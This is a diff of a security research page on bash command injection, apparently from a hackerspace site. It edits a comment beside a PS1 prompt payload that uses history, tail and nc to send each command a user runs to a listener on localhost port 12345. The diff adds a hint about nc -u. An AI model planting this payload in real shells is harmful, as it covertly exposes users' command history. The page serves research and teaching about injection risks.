801labs/801labs.org/content/research/bash-command-injection.md

 Snooping on command history:

     '$(history -a; tail -n 1 ~/.bash_history | nc -q 0 localhost 12345)\u@\h:\w$ '
-    # set up a listener on localhost 12345 to snoop on what the user is running
+    # set up a listener on localhost 12345 to snoop on what the user is running.
+    # nc -u might be necessary or simpler in some cases, too.

 There are limits to how real-time you can snoop.
 You might expect this would allow for complete output snooping: